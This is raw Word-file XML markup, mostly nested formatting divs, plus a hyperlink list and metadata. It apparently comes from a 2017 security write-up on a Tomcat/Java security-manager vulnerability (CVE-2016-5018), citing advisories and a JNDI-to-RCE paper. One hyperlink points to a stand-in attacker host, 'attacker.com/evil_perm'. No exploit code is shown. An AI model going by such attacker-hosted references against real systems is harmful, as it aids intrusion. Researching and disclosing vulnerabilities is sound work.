            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="236986903">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="800340933">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1381830732">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="770709991">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="105"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="669602743">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="207939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7442694">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="830682725">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1324703004">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="72899429">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1328166515">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1169255270">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="105"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1676306204">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="100440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b.apache.org/derby/docs/10.8/ref/rrefreloadpolicyproc.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_3/java/org/apache/jasper/runtime/JspRuntimeLibrary.java" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tomcat.apache.org/security-9.html" TargetMode="External"/><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docs.oracle.com/cd/E18930_01/html/821-2418/beabx.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tomcat.apache.org/tomcat-9.0-doc/security-manager-howto.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" TargetMode="External"/><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www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/bid/93942"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oracle.com/javase/7/docs/api/java/security/AccessController.html)" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tomcat.apache.org/security-6.html"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attacker.com/evil_perm" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tomcat.apache.org/security-7.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://svn.apache.org/viewvc/tomcat/tc7.0.x/trunk/java/org/apache/jasper/runtime/JspRuntimeLibrary.java?r1=1754902&amp;r2=1754901&amp;pathrev=1754902" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5018"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github.com/apache/derby/blob/trunk/java/engine/org/apache/derby/catalog/SystemProcedures.java" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tomcat.apache.org/security-8.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" TargetMode="External"/><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hyperlink" Target="https://community.hpe.com/t5/user/viewprofilepage/user-id/1399173"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9A0AC4-5EE1-458F-9D33-D484DE2DC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2128</Words>
  <Characters>12130</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>101</Lines>
  <Paragraphs>28</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14230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H4ck0rInj</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>H4ck0rInj</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-22T04:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-22T04:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>